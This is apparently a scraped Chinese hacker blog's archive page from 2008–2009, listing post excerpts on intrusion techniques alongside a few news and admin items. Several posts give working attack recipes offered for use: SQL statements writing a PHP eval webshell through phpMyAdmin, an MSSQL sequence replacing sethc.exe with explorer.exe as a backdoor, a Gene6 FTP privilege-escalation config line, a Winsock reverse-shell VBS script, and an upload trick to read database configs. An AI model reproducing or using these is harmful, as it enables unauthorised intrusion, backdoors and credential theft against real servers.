http://www.bycnboy.com/cnboy/soft_cnboy/x-scan.html

[欢迎光临] ： 提示：如果你觉得音乐太吵闹，请你选择下面静音版浏览博客。
中国知音在线 http://Online.bycnboy.com

★→切换到: ∑静音版∈ ∮音乐版 ∮ ∈←
中国知音QQ:274088126 Msn:CnBoy99@Hotmail.com E-mail:lide8008@163.com

分类: [技术文章]预览模式: 普通 | 列表

[微软漏洞] 微软IE8正式发布前数小时被黑客成功入侵

作者:中国知音日期:2009-03-21

[微软漏洞] 微软IE8正式发布前数小时被黑客成功入侵

北京时间3月20日消息，据国外媒体报道，在微软正式发布IE8最终版几个小时之前，在PWN2OWN黑客大赛上，德国一安全研究人员在5分钟内成功黑掉了该浏览器，并因此赢取了5000美元奖金和一台索尼笔记本。

　　该安全研究人员是来自德国的一个计算机专业学生，通过利用此前一个未公布的IE8安全漏洞，他在数分钟之类入侵了这台安装Windows 7的索尼笔记本。

　　目前微软已经针对Windows XP、Vista、Server 2003和Server 2008推出了IE8最终版。但是，针对Windows 7的最终版本还没有发布。

　　不过，微软拒绝证实该安全漏洞的存在。微软一发言人表示，微软正在调查IE8是否真的存在该漏洞，一旦被证实，微软将采取措施来保护用户。

　　另外，该安全研究人员通过使用之前创建的攻击代码，还成功攻击了苹果的Safari和Mozilla的火狐浏览器，他在当天下午的全部收获为15000美元现金和一台索尼笔记本。

Tags: 微软微软漏洞漏洞 IE IE 系统漏洞系统漏洞

分类:[技术文章] | 固定链接 | 评论: 0 | 引用: 0 | 查看次数: 672

[渗透技术] Dsniff 嗅探工具的使用介绍

作者:中国知音日期:2008-04-27

[渗透技术] Dsniff 嗅探工具的使用介绍

导读：
　　我以前讲过了nc和nmap这些工具，我们今天就来讲一下Dsniff 工具，dsniff是一个免费的工具集，最初的设计是为了更好的完成网络渗透测试，但发布的同时也被一些爱搞破坏的hacker用来嗅探和侦听网络会话。
　　Dsniff是一个高级的口令嗅探器, Dug Song写的Dsniff的工具是第一批扩展了传统的sniffer概念的监听工具。Dsniff将制造的数据包注入到网络，并将通信数据重新定向到攻击者的机器。在这种方式下，Dsniff允许攻击者在交换环境的网络内窃听数据，甚至在攻击者和攻击目标不在同一个Lan(局域网)的情况下，也能使攻击者收集到他想要的数据。它支持telnet 、ftp、smtp、pop、imap、http,以及其他的一些应用协议，如果你只想获得用户主机的口令和用户名的话，就请选择dsniff。

Tags: 安全安全技术文章技术文章渗透渗透

分类:[技术文章] | 固定链接 | 评论: 0 | 引用: 0 | 查看次数: 993

[技术文章] sa 无xp_cmdshell下取权限又一简单方法

作者:中国知音日期:2008-04-27

[技术文章] sa 无xp_cmdshell下取权限又一简单方法

导读：
　　在用exec sp_oacreate 'wscript.shell'也没办法的情况下。。可用此方法
　　（很多服务器都把'wscript.shell'给删了。）
　　上网找了些资料，得到下面方法：
　　复制文件：
　　declare @o int
　　exec sp_oacreate 'scripting.filesystemobject', @o out
　　exec sp_oamethod @o, 'copyfile',null,'c:\windows\explorer.exe' ,'c:\windows\system32\sethc.exe';
　　declare @oo int
　　exec sp_oacreate 'scripting.filesystemobject', @oo out
　　此法随无技术可言，希望对某些人有点用。

Tags: 安全安全技术文章技术文章

分类:[技术文章] | 固定链接 | 评论: 0 | 引用: 0 | 查看次数: 1020

[网络安全] Vista用户慎用第三方输入法

作者:中国知音日期:2008-04-27

[网络安全] Vista用户慎用第三方输入法
已确定受影响系统：windows vista x86
内容： vista系统在未登陆状态下，只能切换系统自带输入法。在人为错误输入情况下，可导致第三方输入法被启用，而进一步本地或远程非法登陆系统。

Tags: 安全安全技术文章技术文章

分类:[技术文章] | 固定链接 | 评论: 0 | 引用: 0 | 查看次数: 1014

[原代码收集] PHPWind超级漏洞简单用

作者:中国知音日期:2008-04-27

[原代码收集] PHPWind超级漏洞简单用

题目：PHPWind超级漏洞简单用
文章作者：hackest [H.S.T]&[L.S.T]&[E.S.T]

此文章已发表在《黑客X档案》第5期杂志上
后经本文作者hackest提交到邪恶八进制论坛
欢迎大家转载，但请务必要记住注明此信息！

一、山雨欲来风满楼

近来创办了"十六进制"安全论坛，用的程序是PHPWind5.3，那天早上我正在管理自己的论坛，发现有人在发广告，禁言了他之后，就去删除他发的广告帖。没想到删除第一个之后竟然提示密码已被更改，需要重新登录！当时就晕了，论坛程序使用的可是官方的最新的呀，我又没改密码，怎么就要重新登录了呢！无奈之下唯有再次登录，没想到居然提示密码错误了！看来密码真的是改了，不过不是我改的！这正是可怕之处，难道又出来了传说中的0day了，官方最新程序居然中招！那时的我真正体会到"郁闷"两个字的含义了！好在一会儿论坛一个版主告诉我，后台密码是他改的，PHPWind出了0day了，通杀5.0.1和5.3版本，官方暂时还没有补丁！

Tags: 代码代码源码源码源代码源代码

分类:[技术文章] | 固定链接 | 评论: 0 | 引用: 0 | 查看次数: 975

[技术文章]　破解mysql root密码的几种方法

作者:中国知音日期:2008-03-23

[技术文章]　破解mysql root密码的几种方法

网上流传的几种破解mysql root密码的几种方法:

方法一
使用phpmyadmin，这是最简单的了，修改mysql库的user表，不过别忘了使用PASSWORD函数。

方法二
使用mysqladmin，这是前面声明的一个特例。
mysqladmin -u root -p password mypasswd
输入这个命令后，需要输入root的原密码，然后root的密码将改为mypasswd。

分类:[技术文章] | 固定链接 | 评论: 0 | 引用: 0 | 查看次数: 1146

[技术文章]　通杀网页加密源代码

作者:中国知音日期:2008-03-23

[技术文章]　通杀网页加密源代码

有些网站的源代码是经过加密的，如何快捷的破解这些加密的代码呢？告诉你一个简单而有效的方法。
在地址栏或按Ctrl+O，输入：

javascript:s=document.documentElement.outerHTML;document.write('<body></body>');document.body.innerText=s;

源代码就出来了。不论加密如何复杂，最终都要还原成浏览器可以解析的html代码，而documentElement.outerHTML正是最终的结果。

Tags: 技术文章技术文章加密解密加密解密

分类:[技术文章] | 固定链接 | 评论: 0 | 引用: 0 | 查看次数: 1104

[黑客技巧] phpMyAdmin 后台拿webshell

作者:中国知音日期:2008-02-09

[黑客技巧] phpMyAdmin 后台拿webshell

1.如何拿到登陆密码. 自己想办法
2.访问 : http://url/phpmyadmin/libraries/select_lang.lib.php 得到物理路径.
3.选择一个Database.运行以下语句.
----start code---
Create TABLE a (cmd text NOT NULL);
Insert INTO a (cmd) VALUES('<?php eval($_POST[1]);?>');
select cmd from a into outfile 'D:/phpMyAdmin/libraries/d.php';
Drop TABLE IF EXISTS a;
----end code---
4.如果没什么意外.对应网站得到webshell

Tags: 提权提权网站入侵网站入侵黑客技术黑客技术

分类:[技术文章] | 固定链接 | 评论: 0 | 引用: 0 | 查看次数: 1181

[黑客宝典] Gene6 FTP 提权方法

作者:中国知音日期:2008-02-09

[黑客宝典] Gene6 FTP 提权方法

在任意帐户配置文件中添加SiteCommandList0=-1,TQ1,c:\a.bat,0,60,0,0,jid

TQ1=命令名

c:\a.bat=实际路径

如果没有修改权限,也可以从本地走~~~

以下为本地管理员配置

Tags: 提权提权网站入侵网站入侵黑客技术黑客技术

分类:[技术文章] | 固定链接 | 评论: 0 | 引用: 0 | 查看次数: 1202

[黑客宝典] 当网站不允许上传时

作者:中国知音日期:2008-02-09

[黑客宝典] 当网站不允许上传时

当网站不允许上传asp cer cdx htr等文件时, 上传一个stm文件, 内容为:

直接请求这个stm文件, conn.asp就一览无遗, 数据库路径也就到手啦!

但是一个前提是服务器的对stm或者shtml的扩展没有删除！

Tags: 提权提权网站入侵网站入侵黑客技术黑客技术

分类:[技术文章] | 固定链接 | 评论: 0 | 引用: 0 | 查看次数: 1047

[漏洞收集] [漏洞收集] SQL版DVBBS后台拿webshell

作者:中国知音日期:2008-02-09

[漏洞收集] [漏洞收集] SQL版DVBBS后台拿webshell

前提是已经进入后台了，看admin/data.asp文件里恢复数据的部分代码
case "RestoreData" '恢复数据
admin_flag=",32,"
dim backpath
if not Dvbbs.master or instr(","&session("flag")&",",admin_flag)=0 then
Errmsg=ErrMsg + "<BR><li>本页面为管理员专用，请<a href=../admin_login.asp target=_top>登录</a>后进入。<br><li>您没有管理本页面的权限。"

Tags: 漏洞漏洞网站漏洞网站漏洞黑客技术黑客技术

分类:[技术文章] | 固定链接 | 评论: 0 | 引用: 0 | 查看次数: 940

[技术文章] 系统泄露密码的入侵分析

作者:中国知音日期:2008-01-13

[技术文章] 系统泄露密码的入侵分析

Windows访问139端口时自动用当前用户、密码连接，造成泄露用户密码，虽然其密码是加密的，但一样可以用来攻击。

　　下面是SMB的密码认证方式。

　　WINDOWS的139口的访问过程，箭头表示数据方向：

　　1.客户端<--------------------建立TCP连接----------------->服务端

　　2.客户端-------客户端类型、支持的服务方式列表等---------->服务端

　　3.客户端<---------服务器认证方式、加密用的key等-----------服务端

Tags: 技术技术技术文章技术文章黑客技术黑客技术系统漏洞系统漏洞

分类:[技术文章] | 固定链接 | 评论: 0 | 引用: 0 | 查看次数: 816

[值得一看] TCP版backshell的VBS脚本

作者:中国知音日期:2008-01-13

[值得一看] TCP版backshell的VBS脚本

作者：lcx

　　这期专栏依旧是vbs，估计大家会有点烦，那我们来点有意思的吧。vbs有一个对像是“SAPI.SpVoice”，可以用它来讲英语的，这个组件在 xp、2003上默认都可以用的，调用后可以听到电脑上一个国外老男人在说话。好比这样一句代码：●CreateObject ("SAPI.SpVoice").Speak "I LOVE YOU"●，保存成vbs后缀后双击就会听到英语的我爱你了。但随之而来我们讲到另一个问题，不保存成vbs或vbe后缀如何运行vbs代码。

一、用mshta来运行vbs
hta这种类型的文件运行后也是系统权限，其调用宿主就是mshta.exe。我们在cmd下运行这样一行代码：●mshta vbscript:createobject("sapi.spvoice").speak("I LOVE YOU.")(window.close)●

Tags: 技术技术技术文章技术文章黑客技术黑客技术脚本脚本

分类:[技术文章] | 固定链接 | 评论: 0 | 引用: 0 | 查看次数: 1055

[黑客知识] TCP版backshell的VBS脚本

作者:中国知音日期:2008-01-13

[黑客知识] TCP版backshell的VBS脚本

'搞一个特殊的站准备用的，没想到，等写完了，洞补上了，郁闷
'by 009, baicker@hotmail.com
'date:071221

Dim revdata
set sock=WScript.createobject( "MSWinsock.Winsock" , "WSEvent_" )
set sc=createobject( "WScript.Shell" )
Set fso =CreateObject( "Scripting.FileSystemObject" )
sock.connect "127.0.0.1" , 1234

Sub WSEvent_Connect()

Tags: 技术技术技术文章技术文章黑客技术黑客技术

分类:[技术文章] | 固定链接 | 评论: 0 | 引用: 0 | 查看次数: 1012

[技术文章] cmd下建立VPN

作者:中国知音日期:2008-01-13

[技术文章] cmd下建立VPN

来源：NetKnave's BLog

架好VPN之时,会在网络连接里出现一个传入的连接,如果要想去掉这个的话,就要修改一下注册表.
[HKEY_CLASSES_ROOT\Interface\{0000010c-0000-0000-C000-000000000046}]

删掉这个键值后,注销再登,就会发现那个传入的连接不见了.

Tags: 技术技术技术文章技术文章黑客技术黑客技术

分类:[技术文章] | 固定链接 | 评论: 0 | 引用: 0 | 查看次数: 995

[技术文章] cmd下建立VPN

作者:中国知音日期:2008-01-13

[技术文章] cmd下建立VPN

1.前提
服务里 windows防火墙停止（或者麻烦点可以把router协议，端口1723配进去）
远程注册表服务必须开启
server服务必须开启
router路由服务必须开启

两块以上网卡的win2000做vpn很方便，添加nat协议后，客户端拨入，能够使用远程网络连接internet。使得部分客户端可提高网络速度，并达到代理的作用。

一块网卡的winxp，win2003做类似的vpn仍然很方便，nat协议添加后，再添加两个接口，一个是本地连接，一个是内部，设置本地连接为全转发，内部为私有模式，既可让有权限的用户拨入。

Tags: 技术技术技术文章技术文章黑客技术黑客技术

分类:[技术文章] | 固定链接 | 评论: 0 | 引用: 0 | 查看次数: 870